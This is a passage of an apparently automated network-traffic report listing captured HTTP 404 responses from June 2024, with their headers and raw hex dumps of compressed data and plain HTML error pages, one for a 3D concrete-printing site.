de 5c 3d 4c ea 51 52 9f 26 f5 38 a9 27 49 7d c6 cf b4 f7 17 a4 58 a1 10 8f 9e 63 c7 5c 69 5a 35 96 f5 fe 9c 57 d7 8f e6 40 6d 1a 63 84 5f d8 45 05 cf 08 0e 87 97 f9 45 3e 84 78 96 a2 60 1b 5a fc 95 81 95 e1 05 99 55 bc a2 da 28 41 8e b4 f7 13 b5 57 7d e4 09 f2 e3 04 97 f9 f1 00 ec c4 37 e6 3f d0 fe 01 ac f1 b4 71 42 4a 65 65 74 b1 f3 21 db 84 73 a5 6a 4e 2b 35 5c aa de af 24 d9 3e 09 b4 0d bd 5f 34 8c 98 dd 05 0e 0d d0 6e b0 1b 27 80 7f 71 13 51 4d 49 0d 83 bb 59 Data Ascii: c36,`g@ICz
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: afb_HTTP.404content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 05 Jun 2024 16:27:48 GMTserver: LiteSpeedData Raw: 63 33 36 0d 0a 80 90 02 80 f8 9f d9 ec 7f ef aa 2c f6 27 64 30 f4 b3 6c 43 c8 d0 06 93 1e 07 7a 1a d3 c2 ba 60 a5 65 49 4f 92 01 7f 8a aa bf d8 ff c5 62 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 76 10 1d 44 d3 3a 34 6a 00 ab 37 2a 7b a4 d9 a7 0f bd d9 41 04 00 7b 88 e3 df ec ba c1 0d 85 83 e6 2f f5 14 ca de 96 e0 e9 34 35 34 6f a8 ec 89 90 5f 8f 48 d8 b6 7a 40 49 50 a7 04 9b 7f 6f cc 7c c5 15 95 c3 1e 51 6e 4c 60 83 f6 b5 3f 3c 7e 0b c6 66 ed f8 b0 0f cf ee 3f bb ff 04 67 8f 76 68 a6 60 36 60 f1 f7 79 68 74 e5 28 10 ce 1e 61 ee a4 0e 52 af f0 a4 55 aa c3 73 1d 68 e5 78 20 81 f7 66 61 82 ac f0 a1 f3 81 1a df cb 66 07 23 52 4d 34 2b a0 c9 59 1a 07 85 71 de 04 2b 63 56 8a ac 6a 3d 89 2c 9d 5a c3 ec 1b d3 22 c9 e7 f0 35 99 fe 2c 16 34 68 06 b7 4e 81 ff 26 d5 21 58 5f 64 99 af 79 cd 97 67 22 ad 4c 43 a0 4d 68 79 70 b3 98 de f4 90 c5 44 b9 92 e8 b2 b3 8d 65 40 af 9b b5 56 19 2e 7c 36 ca 47 67 59 7e 95 b6 98 9d 09 56 95 41 34 b3 1f f8 48 16 5d 99 fc 9e eb 90 31 84 8d 0c 81 5c 4d e1 0a e1 d2 28 52 2c 2e 2a ee 04 fb 87 fa b6 69 b8 eb 6e 0e 72 d2 75 43 b1 93 2c bb c7 95 49 e4 fa 03 bf 09 ca bc f7 4d 30 f5 37 54 d0 f2 4a ea bf d0 4e f4 c2 1a 23 ac a0 b3 27 57 8d 65 f7 ac c1 a6 cc 1b a3 99 8a 84 9e 44 0e 6c 76 92 30 1b dd a1 1f e7 7a 5d 8e d3 61 3a cc 6f 7f 1b 90 75 47 ff 37 57 aa 37 a3 32 a7 f2 3e db 05 c9 45 02 a5 8d d4 69 e5 3d 66 84 e8 ae 7c 91 65 95 d0 b7 3e ad 94 69 c5 52 71 47 b5 10 84 6f b6 45 39 78 8b 6b f0 0d 79 d3 50 76 9e 0e c7 69 8e 20 56 29 e0 1a 5e 0c d0 55 59 1a 1d 7c aa c3 32 b9 95 be c2 73 2b ef af 77 60 f2 eb ca fb 0b 52 c5 38 cf 4f 2e 1f be e6 6b d2 ff cc 9d 29 c6 79 9e 5c e6 79 32 ce f3 3b ad e0 ec be 5d 78 0a a5 e2 41 ea e4 dc db 60 b4 0d c9 5a 52 d0 bc 21 4f 24 c5 ce 22 ed 8e f5 3c a3 19 77 24 af 0a 00 0b 23 ba 44 6a db 86 64 d0 be 17 49 10 68 1b b8 23 3e 5c e3 25 c1 68 ec 3a 34 2b a6 f6 10 cc 9d 89 13 c4 66 4f 48 6c fe 58 cb 49 37 93 3d 32 86 87 80 76 02 4d 13 c4 4f 8c 0e b8 5f f4 c7 c4 39 9e 38 a2 18 8e 86 fc 00 58 04 c3 5e da 6d ae 37 57 0f 93 7a 94 d4 67 49 3d 4e ea f3 a4 be e0 67 da fb 0b 52 ac 50 88 47 cf b1 63 ae 34 ad 1a cb 7a 7f ce ab eb 47 73 a0 36 8d 31 c2 2f ec a2 82 67 04 47 c3 bb f9 55 3e 84 78 96 a2 60 1b 5a fc 95 81 95 e1 05 99 55 bc a2 da 28 41 8e b4 f7 13 b5 57 7d e4 09 f2 93 04 77 f3 93 01 d8 89 6f cc 7f a0 fd 03 58 e3 69 e3 84 94 ca ca e8 62 e7 43 b6 09 e7 4a d5 9c 56 6a b8 54 bd 5f 49 b2 7d 12 68 1b 7a bf 68 18 31 bb 03 1c 1a a0 dd 60 37 4e 00 ff e2 26 a2 9a 92 1a 06 77 b2 Data Ascii: c36,'d0lCz
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: afb_HTTP.404content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 05 Jun 2024 16:27:50 GMTserver: LiteSpeedData Raw: 63 33 35 0d 0a 80 90 02 80 f8 9f d9 ec 7f ef aa 2c f6 a7 c9 60 e8 67 d9 86 40 06 83 49 8f 43 7a 1a d3 c2 ba 60 a5 65 49 4f 92 01 7f 8a aa bf d8 ff c5 62 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 7e 10 1d 44 b3 3a 34 6a 00 ab 37 2a 7b a4 d9 a7 0f bd f9 41 04 00 7b 88 e3 df ec ba c1 0d 85 83 e6 2f f5 14 ca de 96 e0 e9 34 35 34 6f a8 ec 89 90 5f 8f 48 d8 b6 7a 40 49 50 a7 04 9b 7f 6f cc 7c c5 15 95 c3 1e 51 6e 4c 60 83 f6 b5 3f 3c 7e 0b c6 e6 ed f8 b0 0f cf ee 3f bb ff 04 a7 8f 76 68 a6 60 36 60 f1 f7 79 68 74 e5 28 10 4e 1f e1 da 49 1d a4 5e e1 49 ab 54 87 e7 3a d0 ca f1 40 02 ef cd c2 04 59 e1 43 e7 03 35 be 97 cd 0f 46 a4 9a 68 56 40 93 b3 34 0e 0a e3 bc 09 56 c6 ac 14 59 d5 7a 12 59 3a b5 86 d9 37 a6 45 92 cf e1 6b 32 fd 59 2c 68 d0 0c 6e 9d 02 ff 4d aa 43 b0 be c8 32 5f f3 9a 2f 4f 45 5a 99 86 40 9b d0 f2 e0 66 31 bd e9 21 8b 89 72 25 d1 65 67 1b cb 80 5e 37 6b ad 32 5c f8 6c 94 8f 4e b3 fc 22 6d 31 3b 15 ac 2a 83 68 66 3f f0 91 2c ba 32 f9 3d d7 1d c6 10 36 32 04 72 35 85 2b 84 4b a3 48 b1 b8 a8 b8 13 ec 1f ea db a6 e1 ae bb 39 c8 49 d7 0d c5 4e b2 ec 1e 57 26 91 eb 0f fc 26 28 f3 de 37 c1 d4 df 50 41 cb 2b a9 ff 42 3b d1 0b 6b 8c b0 82 ce 9e 5c 35 96 dd b3 06 9b 32 6f 8c 66 2a 12 7a 12 39 b0 d9 49 c2 6c 74 87 7e 9c ab 75 39 4e 87 e9 30 bf fd 6d 40 d6 1d fd df 5c a9 de 9c ca 9c ca fb 6c 17 24 17 09 94 36 52 a7 95 f7 98 11 a2 bb f2 45 96 55 42 df fa b4 52 a6 15 4b c5 1d d5 42 10 be d9 16 e5 e0 2d ae c1 37 e4 4d 43 d9 24 1d 8e d3 1c 41 ac 52 c0 35 bc 18 a0 ab b2 34 3a f8 54 87 65 72 2b 7d 85 e7 56 de 5f ed c0 e4 d7 95 f7 17 a4 8a 71 9e 1f 9f 3f 7c cd d7 a4 ff b9 76 a6 18 e7 79 72 9e e7 c9 38 cf ef b4 82 b3 fb 76 e1 29 94 8a 07 a9 93 73 6f 83 d1 36 24 6b 49 41 f3 86 3c 91 14 3b 8f b4 3b d6 f3 8c 66 dc 91 bc 2a 00 2c 8c e8 12 a9 6d 1b 92 41 fb 5e 24 41 a0 6d e0 8e f8 70 8d 97 04 a3 b1 eb d0 ac 98 da 43 70 ed 4c 9c 20 36 7b 42 62 f3 c7 5a 4e ba 99 ee 91 31 3c 04 b4 13 68 9a 20 7e 62 74 c0 fd a2 3f 26 26 78 e2 88 62 38 1a f2 03 60 11 0c 7b 6e b7 b9 de 5c 3d 4c ea 51 52 9f 26 f5 38 a9 27 49 7d c6 cf b4 f7 17 a4 58 a1 10 8f 9e 63 c7 5c 69 5a 35 96 f5 fe 9c 57 d7 8f e6 40 6d 1a 63 84 5f d8 45 05 cf 08 0e 87 97 f9 45 3e 84 78 96 a2 60 1b 5a fc 95 81 95 e1 05 99 55 bc a2 da 28 41 8e b4 f7 13 b5 57 7d e4 09 f2 e3 04 97 f9 f1 00 ec c4 37 e6 3f d0 fe 01 ac f1 b4 71 42 4a 65 65 74 b1 f3 21 db 84 73 a5 6a 4e 2b 35 5c aa de af 24 d9 3e 09 b4 0d bd 5f 34 8c 98 dd 05 0e 0d d0 6e b0 1b 27 80 7f 71 13 51 4d 49 0d 83 bb 59 Data Ascii: c35,`g@ICz
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: public,max-age=3600x-litespeed-tag: afb_HTTP.404,afb_404,afb_URL.bb612978f523fb6348e4e3107ed53975,afb_x-litespeed-cache: misstransfer-encoding: chunkeddate: Wed, 05 Jun 2024 16:27:53 GMTserver: LiteSpeedData Raw: 32 39 62 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 45 4f 20 2d 2d 3e 0d 0a 3c 74 69 74 6c 65 3e 53 48 41 48 41 46 20 33 44 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 72 65 74 65 20 33 44 20 50 72 69 6e 74 69 6e 67 20 46 75 6c 6c 79 20 49 6e 74 65 67 72 61 74 65 64 20 52 6f 62 6f 74 69 63 20 53 79 73 74 65 6d 73 22 2f 3e 0d 0a 3c 21 2d 2d 20 6f 67 20 6d 65 74 61 20 66 6f 72 20 66 61 63 65 62 6f 6f 6b 2c 20 67 6f 6f 67 6c 65 70 6c 75 73 20 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 48 41 48 41 46 20 33 44 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 72 65 74 65 20 33 44 20 50 72 69 6e 74 69 6e 67 20 46 75 6c 6c 79 20 49 6e 74 65 67 72 61 74 65 64 20 52 6f 62 6f 74 69 63 20 53 79 73 74 65 6d 73 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 68 61 68 61 66 33 64 2e 63 6f 6d 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 68 61 68 61 66 33 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 38 2f 73 68 61 68 61 66 2d 33 64 2d 63 6f 6e 63 72 65 74 65 2d 70 72 69 6e 74 69 6e 67 2e 6a 70 67 22 2f 3e 0d 0a 0d 0a 3c 21 2d 2d 20 74 77 69 74 74 65 72 20 6d 65 74 61 20 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 2f 3e 0d 0a 3c 6d Data Ascii: 29b1<!DOCTYPE html><html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" cont
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:28:22 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:28:25 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:28:27 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1236Date: Wed, 05 Jun 2024 16:28:56 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 